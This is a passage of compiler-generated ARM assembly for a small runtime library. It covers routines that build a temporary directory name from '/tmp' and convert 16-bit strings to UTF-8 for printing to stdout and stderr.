#-108] eor r3, r3, #1 and r3, r3, #255 cmp r3, #0 beq .L415 ldrb r3, [fp, #-121] @ zero_extendqisi2 cmp r3, #0 beq .L415 bl __errno_location mov r3, r0 ldr r3, [r3] cmp r3, #17 moveq r3, #1 movne r3, #0 strb r3, [fp, #-108] .L415: ldr r0, [fp, #-104] bl free ldrb r3, [fp, #-108] @ zero_extendqisi2 mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L419: .align 2 .L418: .word stderr .word .LC0 .word 16895 .size shar__make__directory, .-shar__make__directory .section .rodata .align 2 .LC7: .ascii "/tmp\000" .text .align 2 .global shar__get__tmp__dir__name .syntax unified .arm .fpu softvfp .type shar__get__tmp__dir__name, %function shar__get__tmp__dir__name: @ args = 0, pretend = 0, frame = 104 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #104 str r0, [fp, #-116] str r1, [fp, #-112] str r2, [fp, #-120] str r3, [fp, #-124] sub r3, fp, #116 ldmia r3, {r2-r3} str r2, [fp, #-68] str r3, [fp, #-64] ldr r3, .L441 str r3, [fp, #-96] ldr r3, [fp, #-120] str r3, [fp, #-92] ldr r3, [fp, #-124] str r3, [fp, #-88] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] ldr r2, [fp, #-68] ldr r3, [fp, #-64] orr r3, r2, r3 cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L421 mov r3, #0 str r3, [fp, #-84] b .L422 .L421: sub r3, fp, #68 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] ldr r3, [fp, #-52] mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-80] ldr r3, [fp, #-80] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L423 ldr r3, .L441+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L441+8 bl fwrite mov r0, #1 bl exit .L423: ldr r3, [fp, #-80] str r3, [fp, #-84] .L422: mov r2, #0 mov r3, #0 str r2, [fp, #-44] str r3, [fp, #-40] mov r3, #1 strb r3, [fp, #-101] .L436: ldr r3, [fp, #-44] ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-100] ldrb r3, [fp, #-100] @ zero_extendqisi2 cmp r3, #0 beq .L440 mov r3, #0 strb r3, [fp, #-99] ldrb r3, [fp, #-100] @ zero_extendqisi2 strh r3, [fp, #-98] @ movhi ldrsb r3, [fp, #-100] cmp r3, #0 blt .L427 mov r3, #1 strb r3, [fp, #-99] b .L428 .L427: ldrb r3, [fp, #-100] @ zero_extendqisi2 and r3, r3, #224 cmp r3, #192 bne .L429 mov r3, #2 strb r3, [fp, #-99] ldr r3, [fp, #-44] add r3, r3, #1 ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-100] ldrb r3, [fp, #-100] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L430 mov r3, #0 strb r3, [fp, #-101] b .L426 .L430: ldrh r3, [fp, #-98] @ movhi eor r3, r3, #192 strh r3, [fp, #-98] @ movhi ldrh r3, [fp, #-98] @ movhi lsl r3, r3, #6 strh r3, [fp, #-98] @ movhi ldrb r3, [fp, #-100] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-98] @ movhi orr r3, r2, r3 strh r3, [fp, #-98] @ movhi b .L428 .L429: ldrb r3, [fp, #-100] @ zero_extendqisi2 and r3, r3, #240 cmp r3, #224 bne .L431 mov r3, #3 strb r3, [fp, #-99] ldr r3, [fp, #-44] add r3, r3, #1 ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-100] ldrb r3, [fp, #-100] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L432 mov r3, #0 strb r3, [fp, #-101] b .L426 .L432: ldrh r3, [fp, #-98] @ movhi eor r3, r3, #224 strh r3, [fp, #-98] @ movhi ldrh r3, [fp, #-98] @ movhi lsl r3, r3, #6 strh r3, [fp, #-98] @ movhi ldrb r3, [fp, #-100] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-98] @ movhi orr r3, r2, r3 strh r3, [fp, #-98] @ movhi ldr r3, [fp, #-44] add r3, r3, #2 ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-100] ldrb r3, [fp, #-100] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L433 mov r3, #0 strb r3, [fp, #-101] b .L426 .L433: ldrh r3, [fp, #-98] @ movhi lsl r3, r3, #6 strh r3, [fp, #-98] @ movhi ldrb r3, [fp, #-100] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-98] @ movhi orr r3, r2, r3 strh r3, [fp, #-98] @ movhi b .L428 .L431: mov r3, #0 strb r3, [fp, #-101] b .L426 .L428: sub r3, fp, #60 ldmia r3, {r2-r3} adds r8, r2, #1 adc r9, r3, #0 str r8, [fp, #-60] str r9, [fp, #-56] sub r3, fp, #60 ldmia r3, {r2-r3} adds r1, r2, r2 str r1, [fp, #-132] adc r3, r3, r3 str r3, [fp, #-128] sub r1, fp, #132 ldmia r1, {r0-r1} sub r3, fp, #68 ldmia r3, {r2-r3} adds r6, r0, r2 adc r7, r1, r3 ldr r3, [fp, #-84] str r3, [fp, #-76] str r6, [fp, #-36] str r7, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-76] bl realloc str r0, [fp, #-72] ldr r3, [fp, #-72] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L434 ldr r3, .L441+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L441+8 bl fwrite mov r0, #1 bl exit .L434: ldr r3, [fp, #-72] str r3, [fp, #-84] ldr r2, [fp, #-68] ldr r3, [fp, #-60] sub r3, r3, #1 lsl r3, r3, #1 add r3, r2, r3 ldr r2, [fp, #-84] add r3, r2, r3 ldrh r2, [fp, #-98] @ movhi strh r2, [r3] @ movhi ldrb r2, [fp, #-99] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #44 ldmia r1, {r0-r1} adds r4, r0, r2 adc r5, r1, r3 str r4, [fp, #-44] str r5, [fp, #-40] b .L436 .L440: nop .L426: ldrb r3, [fp, #-101] eor r3, r3, #1 and r3, r3, #255 cmp r3, #0 beq .L437 ldr r3, [fp, #-84] cmp r3, #0 beq .L438 ldr r0, [fp, #-84] bl free .L438: mov r3, #0 str r3, [fp, #-84] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] .L437: ldr r3, [fp, #-88] ldr r2, [fp, #-84] str r2, [r3] ldr r1, [fp, #-92] sub r3, fp, #60 ldmia r3, {r2-r3} stm r1, {r2-r3} nop sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L442: .align 2 .L441: .word .LC7 .word stderr .word .LC0 .size shar__get__tmp__dir__name, .-shar__get__tmp__dir__name .section .rodata .align 2 .LC8: .word __stack_chk_guard .text .align 2 .global shar__print__string .syntax unified .arm .fpu softvfp .type shar__print__string, %function shar__print__string: @ args = 0, pretend = 0, frame = 360 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #360 str r0, [fp, #-340] str r1, [fp, #-336] str r2, [fp, #-344] ldr r3, .L459 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 ldr r3, .L459+4 ldr r1, [r3] sub r3, fp, #340 ldmia r3, {r2-r3} str r2, [fp, #-316] str r3, [fp, #-312] ldr r3, [fp, #-344] str r3, [fp, #-324] str r1, [fp, #-320] mov r3, #0 strb r3, [fp, #-327] sub r3, fp, #316 ldmia r3, {r2-r3} orrs r3, r2, r3 bne .L444 ldrb r3, [fp, #-327] @ zero_extendqisi2 cmp r3, #0 beq .L457 .L444: mov r2, #0 mov r3, #0 str r2, [fp, #-308] str r3, [fp, #-304] mov r2, #0 mov r3, #0 str r2, [fp, #-300] str r3, [fp, #-296] b .L446 .L452: ldr r3, [fp, #-300] lsl r2, r3, #1 ldr r3, [fp, #-324] add r1, r3, r2 sub r3, fp, #28 sub r2, r3, #296 sub r2, r2, #2 ldrh r3, [r1] @ movhi strh r3, [r2] @ movhi sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #0 beq .L458 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #127 bhi .L449 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-356] adc r3, r3, #0 str r3, [fp, #-352] sub r3, fp, #356 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] b .L450 .L449: sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #2048 bcs .L451 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-364] adc r3, r3, #0 str r3, [fp, #-360] sub r3, fp, #364 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-372] adc r3, r3, #0 str r3, [fp, #-368] sub r3, fp, #372 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] b .L450 .L451: sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-380] adc r3, r3, #0 str r3, [fp, #-376] sub r3, fp, #380 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-388] adc r3, r3, #0 str r3, [fp, #-384] sub r3, fp, #388 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r6, r2, #1 adc r7, r3, #0 str r6, [fp, #-308] str r7, [fp, #-304] .L450: sub r3, fp, #308 ldmia r3, {r2-r3} cmp r3, #0 cmpeq r2, #253 bls .L448 ldr r2, [fp, #-308] sub r0, fp, #288 ldr r3, [fp, #-320] mov r1, #1 bl fwrite mov r2, #0 mov r3, #0 str r2, [fp, #-308] str r3, [fp, #-304] b .L448 .L458: nop .L448: sub r3, fp, #300 ldmia r3, {r2-r3} adds r8, r2, #1 adc r9, r3, #0 str r8, [fp, #-300] str r9, [fp, #-296] .L446: sub r1, fp, #316 ldmia r1, {r0-r1} sub r3, fp, #300 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L452 ldrb r3, [fp, #-327] @ zero_extendqisi2 cmp r3, #0 beq .L453 sub r2, fp, #288 ldr r3, [fp, #-308] add r3, r2, r3 mov r2, #10 strb r2, [r3] sub r3, fp, #308 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 str r4, [fp, #-308] str r5, [fp, #-304] .L453: sub r3, fp, #308 ldmia r3, {r2-r3} orrs r3, r2, r3 beq .L454 ldr r2, [fp, #-308] sub r0, fp, #288 ldr r3, [fp, #-320] mov r1, #1 bl fwrite .L454: ldr r0, [fp, #-320] bl fflush .L457: nop nop ldr r3, .L459 ldr r2, [r3] ldr r3, [fp, #-32] eors r2, r3, r2 mov r3, #0 beq .L455 bl __stack_chk_fail .L455: sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L460: .align 2 .L459: .word .LC8 .word stdout .size shar__print__string, .-shar__print__string .section .rodata .align 2 .LC9: .word __stack_chk_guard .text .align 2 .global shar__println__string .syntax unified .arm .fpu softvfp .type shar__println__string, %function shar__println__string: @ args = 0, pretend = 0, frame = 360 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #360 str r0, [fp, #-340] str r1, [fp, #-336] str r2, [fp, #-344] ldr r3, .L477 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 ldr r3, .L477+4 ldr r1, [r3] sub r3, fp, #340 ldmia r3, {r2-r3} str r2, [fp, #-316] str r3, [fp, #-312] ldr r3, [fp, #-344] str r3, [fp, #-324] str r1, [fp, #-320] mov r3, #1 strb r3, [fp, #-327] sub r3, fp, #316 ldmia r3, {r2-r3} orrs r3, r2, r3 bne .L462 ldrb r3, [fp, #-327] @ zero_extendqisi2 cmp r3, #0 beq .L475 .L462: mov r2, #0 mov r3, #0 str r2, [fp, #-308] str r3, [fp, #-304] mov r2, #0 mov r3, #0 str r2, [fp, #-300] str r3, [fp, #-296] b .L464 .L470: ldr r3, [fp, #-300] lsl r2, r3, #1 ldr r3, [fp, #-324] add r1, r3, r2 sub r3, fp, #28 sub r2, r3, #296 sub r2, r2, #2 ldrh r3, [r1] @ movhi strh r3, [r2] @ movhi sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #0 beq .L476 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #127 bhi .L467 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-356] adc r3, r3, #0 str r3, [fp, #-352] sub r3, fp, #356 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] b .L468 .L467: sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #2048 bcs .L469 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-364] adc r3, r3, #0 str r3, [fp, #-360] sub r3, fp, #364 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-372] adc r3, r3, #0 str r3, [fp, #-368] sub r3, fp, #372 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] b .L468 .L469: sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-380] adc r3, r3, #0 str r3, [fp, #-376] sub r3, fp, #380 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-388] adc r3, r3, #0 str r3, [fp, #-384] sub r3, fp, #388 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r6, r2, #1 adc r7, r3, #0 str r6, [fp, #-308] str r7, [fp, #-304] .L468: sub r3, fp, #308 ldmia r3, {r2-r3} cmp r3, #0 cmpeq r2, #253 bls .L466 ldr r2, [fp, #-308] sub r0, fp, #288 ldr r3, [fp, #-320] mov r1, #1 bl fwrite mov r2, #0 mov r3, #0 str r2, [fp, #-308] str r3, [fp, #-304] b .L466 .L476: nop .L466: sub r3, fp, #300 ldmia r3, {r2-r3} adds r8, r2, #1 adc r9, r3, #0 str r8, [fp, #-300] str r9, [fp, #-296] .L464: sub r1, fp, #316 ldmia r1, {r0-r1} sub r3, fp, #300 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L470 ldrb r3, [fp, #-327] @ zero_extendqisi2 cmp r3, #0 beq .L471 sub r2, fp, #288 ldr r3, [fp, #-308] add r3, r2, r3 mov r2, #10 strb r2, [r3] sub r3, fp, #308 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 str r4, [fp, #-308] str r5, [fp, #-304] .L471: sub r3, fp, #308 ldmia r3, {r2-r3} orrs r3, r2, r3 beq .L472 ldr r2, [fp, #-308] sub r0, fp, #288 ldr r3, [fp, #-320] mov r1, #1 bl fwrite .L472: ldr r0, [fp, #-320] bl fflush .L475: nop nop ldr r3, .L477 ldr r2, [r3] ldr r3, [fp, #-32] eors r2, r3, r2 mov r3, #0 beq .L473 bl __stack_chk_fail .L473: sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L478: .align 2 .L477: .word .LC9 .word stdout .size shar__println__string, .-shar__println__string .section .rodata .align 2 .LC10: .word __stack_chk_guard .text .align 2 .global shar__print__as__error .syntax unified .arm .fpu softvfp .type shar__print__as__error, %function shar__print__as__error: @ args = 0, pretend = 0, frame = 360 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #360 str r0, [fp, #-340] str r1, [fp, #-336] str r2, [fp, #-344] ldr r3, .L495 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 ldr r3, .L495+4 ldr r1, [r3] sub r3, fp, #340 ldmia r3, {r2-r3} str r2, [fp, #-316] str r3, [fp, #-312] ldr r3, [fp, #-344] str r3, [fp, #-324] str r1, [fp, #-320] mov r3, #0 strb r3, [fp, #-327] sub r3, fp, #316 ldmia r3, {r2-r3} orrs r3, r2, r3 bne .L480 ldrb r3, [fp, #-327] @ zero_extendqisi2 cmp r3, #0 beq .L493 .L480: mov r2, #0 mov r3, #0 str r2, [fp, #-308] str r3, [fp, #-304] mov r2, #0 mov r3, #0 str r2, [fp, #-300] str r3, [fp, #-296] b .L482 .L488: ldr r3, [fp, #-300] lsl r2, r3, #1 ldr r3, [fp, #-324] add r1, r3, r2 sub r3, fp, #28 sub r2, r3, #296 sub r2, r2, #2 ldrh r3, [r1] @ movhi strh r3, [r2] @ movhi sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #0 beq .L494 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #127 bhi .L485 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-356] adc r3, r3, #0 str r3, [fp, #-352] sub r3, fp, #356 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] b .L486 .L485: sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #2048 bcs .L487 sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-364] adc r3, r3, #0 str r3, [fp, #-360] sub r3, fp, #364 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-372] adc r3, r3, #0 str r3, [fp, #-368] sub r3, fp, #372 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] b .L486 .L487: sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-380] adc r3, r3, #0 str r3, [fp, #-376] sub r3, fp, #380 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-388] adc r3, r3, #0 str r3, [fp, #-384] sub r3, fp, #388 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r3, r3, #24 and r1, r3, #255 sub r2, fp, #288 ldr r3, [fp, #-308] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #308 ldmia r3, {r2-r3} adds r6, r2, #1 adc r7, r3, #0 str r6, [fp, #-308] str r7, [fp, #-304] .L486: sub r3, fp, #308 ldmia r3, {r2-r3} cmp r3, #0 cmpeq r2, #253 bls .L484 ldr r2, [fp, #-308] sub r0, fp, #288 ldr r3, [fp, #-320] mov r1, #1 bl fwrite mov r2, #0 mov r3, #0 str r2, [fp, #-308] str r3, [fp, #-304] b .L484 .L494: nop .L484: sub r3, fp, #300 ldmia r3, {r2-r3} adds r8, r2, #1 adc r9, r3, #0 str r8, [fp, #-300] str r9, [fp, #-296] .L482: sub r1, fp, #316 ldmia r1, {r0-r1} sub r3, fp, #300 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L488 ldrb r3, [fp, #-327] @ zero_extendqisi2 cmp r3, #0 beq .L489 sub r2, fp, #288 ldr r3, [fp, #-308] add r3, r2, r3 mov r2, #10 strb r2, [r3] sub r3, fp, #308 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 str r4, [fp, #-308] str r5, [fp, #-304] .L489: sub r3, fp, #308 ldmia r3, {r2-r3} orrs r3, r2, r3 beq .L490 ldr r2, [fp, #-308] sub r0, fp, #288 ldr r3, [fp, #-320] mov r1, #1 bl fwrite .L490: ldr r0, [fp, #-320] bl fflush .L493: nop nop ldr r3, .L495 ldr r2, [r3] ldr r3, [fp, #-32] eors r2, r3, r2 mov r3, #0 beq .L491 bl __stack_chk_fail .L491: sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L496: .align 2 .L495: .word .LC10 .word stderr .size shar__print__as__error, .-shar__print__as__error .section .rodata .align 2 .LC11: .word __stack_chk_guard .text .align 2 .global shar__println__as__error .syntax unified .arm .fpu softvfp .type shar__println__as__error, %function shar__println__as__error: @ args = 0, pretend = 0, frame = 360 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #360 str r0, [fp, #-340] str r1, [fp, #-336] str r2, [fp, #-344] ldr r3, .L513 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 ldr r3, .L513+4 ldr r1, [r3] sub r3, fp, #340 ldmia r3, {r2-r3} str r2, [fp, #-316] str r3, [fp, #-312] ldr r3, [fp, #-344] str r3, [fp, #-324] str r1, [fp, #-320] mov r3, #1 strb r3, [fp, #-327] sub r3, fp, #316 ldmia r3, {r2-r3} orrs r3, r2, r3 bne .L498 ldrb r3, [fp, #-327] @ zero_extendqisi2 cmp r3, #0 beq .L511 .L498: mov r2, #0 mov r3, #0 str r2, [fp, #-308] str r3, [fp, #-304] mov r2, #0 mov r3, #0 str r2, [fp, #-300] str r3, [fp, #-296] b .L500 .L506: ldr r3, [fp, #-300] lsl r2, r3, #1 ldr r3, [fp, #-324] add r1, r3, r2 sub r3, fp, #28 sub r2, r3, #296 sub r2, r2, #2 ldrh r3, [r1] @ movhi strh r3, [r2] @ movhi sub r3, fp, #28 sub r3, r3, #296 sub r3, r3, #2 ldrh r3, [r3] cmp r3, #0 beq .L512 sub r3, fp, #28 sub r3, r3, #296 sub 